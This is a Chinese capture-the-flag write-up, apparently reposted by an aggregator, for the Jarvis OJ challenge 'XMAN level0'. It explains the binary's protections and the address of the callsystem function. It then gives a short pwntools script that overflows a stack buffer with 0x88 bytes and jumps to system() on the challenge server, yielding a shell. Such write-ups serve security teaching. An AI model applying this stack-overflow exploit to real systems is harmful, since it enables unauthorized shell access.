當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[Jarvis OJ - PWN]——[XMAN]level0

發布時間：2024/4/17 编程问答 29 豆豆

生活随笔收集整理的這篇文章主要介紹了 [Jarvis OJ - PWN]——[XMAN]level0 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

[Jarvis OJ - PWN]——[XMAN]level0

題目地址：https://www.jarvisoj.com/challenges
題目：

checksec看看，64位，開啟了NX保護

IDA,發現了我們的system函數，里面的參數也是我們想要的

找到callsystem函數的地址 0x400596 ，或者 system函數開始壓參的地址0x40059A都可以作為返回地址。

exploit:

from pwn import * p = remote("pwn2.jarvisoj.com",9881) ret = 0x040059A # ret= 0x0400596 payload = 'a'* (0x80 + 0x8) + p64(ret) p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[XMAN]level0的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： [Jarvis OJ - PWN]——[
下一篇： [Jarvis OJ - PWN]——T